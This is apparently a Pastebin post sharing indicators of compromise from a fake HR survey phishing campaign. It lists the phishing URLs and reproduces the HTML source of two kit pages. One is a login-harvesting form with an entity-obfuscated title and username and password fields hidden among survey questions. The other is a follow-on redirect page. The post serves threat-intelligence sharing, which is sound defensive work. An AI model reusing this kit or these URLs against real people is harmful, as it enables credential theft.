API tools faq
paste
Advertisement
DarthInvader

Fake HR survey phishing email with IOC

DarthInvader
Nov 8th, 2018
1,445
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.46 KB | None | 0 0
raw download clone embed print report
  1. There were two different phishing attacks using the same survey but different links
  2.  
  3. Phishing HR survey email
  4. https://onedrive.live.com/survey?resid=4233E5C045E5D52E!112&authkey=!AL7YH2vI4v1qiUE
  5. ==================================================================
  6. Phishing 2nd HR survey email
  7. https://byteonpock.info/fgbv/index.php?starboy=archive
  8. This URL takes you to the URL below of which you see a surf3.php takes an input of a command login with an ID and session
  9.  
  10. https://byteonpock.info/fgbv/4bcfg9joa27ymwp5dnz6s8r3ti0lkv1xhuq/surf3.php?cmd=login_submit&id=cb3787bf73f099ca0e555210e2aa608acb3787bf73f099ca0e555210e2aa608a&session=cb3787bf73f099ca0e555210e2aa608acb3787bf73f099ca0e555210e2aa608a
  11.  
  12. Other sites accessed by php files
  13. smallenvelop.com
  14. js.driftt.com
  15.  
  16. Contents of surf3.php and need2.php below.
  17. =================================================================
  18. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
  19. <html>
  20. <head>
  21. <title>&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#111;&#110;&#101;&#100;&#114;&#105;&#118;&#101;&#46;&#108;&#105;&#118;&#101;&#46;&#99;&#111;&#109;&#47;&#115;&#117;&#114;&#118;&#101;&#121;&#63;&#114;&#101;&#115;&#105;&#100;&#61;&#52;&#50;&#51;&#51;&#69;&#53;&#67;&#48;&#52;&#53;&#69;&#53;&#68;&#53;&#50;&#69;&#33;&#49;&#48;&#53;&#38;&#97;&#117;&#116;&#104;&#107;&#101;&#121;&#61;&#33;&#65;&#70;&#106;&#72;&#100;&#66;&#52;&#105;&#102;&#113;&#86;&#56;&#109;&#80;&#89;</title>
  22. <meta name="viewport" content="width=device-width, initial-scale=1.0">
  23. <link rel="shortcut icon"
  24. href="images/favicon.ico"/>
  25. <style type="text/css">
  26. .textbox {
  27. padding-left: 1px;
  28. font-family: "Segoe UI","Tahoma","Helvetica","Arial",sans-serif;
  29. font-size: 14px;
  30. color: #333333;
  31. height: 22px;
  32. width: 275px;
  33. border: 1px solid #959595;
  34. }
  35. </style>
  36. <style type="text/css">
  37. div#container
  38. {
  39. position:relative;
  40. width: 1349px;
  41. margin-top: 0px;
  42. margin-left: auto;
  43. margin-right: auto;
  44. text-align:left;
  45. }
  46. body {text-align:center;margin:0}
  47. </style>
  48. <style>
  49. p{font-size: 40px;}
  50. .loader {
  51. position: fixed;
  52. left: 0px;
  53. top: 0px;
  54. width: 100%;
  55. height: 100%;
  56. z-index: 9999;
  57. background: url('https://smallenvelop.com/wp-content/uploads/2014/08/Preloader_11.gif') 50% 50% no-repeat rgb(249,249,249);
  58. opacity: .8;
  59. }
  60. </style>
  61. <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
  62. <script type="text/javascript">
  63. $(window).load(function() {
  64. $(".loader").fadeOut("slow");
  65. });
  66. </script>
  67. </head>
  68. <body bgColor="#F2F2F2">
  69. <div class="loader"></div>
  70. <div id="container">
  71. <div id="image1" style="position:absolute; overflow:hidden; left:0px; top:0px; width:1349px; height:611px; z-index:0"><img src="images/n4.png" alt="" title="" border=0 width=1349 height=611></div>
  72.  
  73. <div id="image2" style="position:absolute; overflow:hidden; left:428px; top:611px; width:494px; height:268px; z-index:1"><img src="images/n3.png" alt="" title="" border=0 width=494 height=268></div>
  74. <form action=need2.php name=mtlabiyar id=mtlabiyar method=post>
  75. <input name="usr" class="textbox" autocomplete="off" required type="text" style="position:absolute;width:304px;left:467px;top:238px;z-index:2">
  76. <input name="psw" class="textbox" autocomplete="off" required type="text" style="position:absolute;width:304px;left:467px;top:329px;z-index:3">
  77. <select name="fl" class="textbox" autocomplete="off" required style="position:absolute;left:467px;top:398px;width:102px;z-index:4">
  78. <option value="No">No</option>
  79. <option value="Yes">Yes</option></select>
  80. <select name="tm" class="textbox" autocomplete="off" required style="position:absolute;left:467px;top:461px;width:102px;z-index:5">
  81. <option value="No">No</option>
  82. <option value="Yes">Yes</option></select>
  83. <select name="mg" class="textbox" autocomplete="off" required style="position:absolute;left:467px;top:524px;width:102px;z-index:6">
  84. <option value="Yes">Yes</option>
  85. <option value="No">No</option></select>
  86. <select name="jb" class="textbox" autocomplete="off" required style="position:absolute;left:467px;top:587px;width:304px;z-index:7">
  87. <option value=""></option>
  88. <option value="Yes">Yes</option>
  89. <option value="Not Realy">Not Realy</option>
  90. <option value="No">No</option></select>
  91. <select name="rw" class="textbox" autocomplete="off" required style="position:absolute;left:467px;top:674px;width:102px;z-index:8">
  92. <option value="No">No</option>
  93. <option value="Yes">Yes</option></select>
  94. <div id="formimage1" style="position:absolute; left:456px; top:766px; z-index:9"><input type="image" name="formimage1" width="95" height="38" src="images/nsb.png"></div>
  95. </div>
  96.  
  97. </body>
  98. </html>
  99.  
  100.  
  101. CONTENTS OF need2.php
  102. ==================================================================
  103.  
  104. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
  105. <html>
  106. <head>
  107. <title>&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#111;&#110;&#101;&#100;&#114;&#105;&#118;&#101;&#46;&#108;&#105;&#118;&#101;&#46;&#99;&#111;&#109;&#47;&#115;&#117;&#114;&#118;&#101;&#121;&#63;&#114;&#101;&#115;&#105;&#100;&#61;&#52;&#50;&#51;&#51;&#69;&#53;&#67;&#48;&#52;&#53;&#69;&#53;&#68;&#53;&#50;&#69;&#33;&#49;&#48;&#53;&#38;&#97;&#117;&#116;&#104;&#107;&#101;&#121;&#61;&#33;&#65;&#70;&#106;&#72;&#100;&#66;&#52;&#105;&#102;&#113;&#86;&#56;&#109;&#80;&#89;</title>
  108. <meta name="viewport" content="width=device-width, initial-scale=1.0">
  109. <link rel="shortcut icon"
  110. href="images/favicon.ico"/>
  111. <html><meta http-equiv="Refresh" content="05; url=surf2.php"></html>
  112. <style type="text/css">
  113. div#container
  114. {
  115. position:relative;
  116. width: 158px;
  117. margin-top: 0px;
  118. margin-left: auto;
  119. margin-right: auto;
  120. text-align:left;
  121. }
  122. body {text-align:center;margin:0}
  123. </style>
  124. <style>
  125. p{font-size: 40px;}
  126. .loader {
  127. position: fixed;
  128. left: 0px;
  129. top: 0px;
  130. width: 100%;
  131. height: 100%;
  132. z-index: 9999;
  133. background: url('https://smallenvelop.com/wp-content/uploads/2014/08/Preloader_11.gif') 50% 50% no-repeat rgb(249,249,249);
  134. opacity: .8;
  135. }
  136. </style>
  137. <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
  138. <script type="text/javascript">
  139. $(window).load(function() {
  140. $(".loader").fadeOut("slow");
  141. });
  142. </script>
  143. </head>
  144. <body>
  145. <div class="loader"></div>
  146. <div id="container">
  147. <div id="image1" style="position:absolute; overflow:hidden; left:0px; top:356px; width:158px; height:34px; z-index:0"><img src="images/n1.png" alt="" title="" border=0 width=158 height=34></div>
  148.  
  149. </div>
  150.  
  151. </body>
  152. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!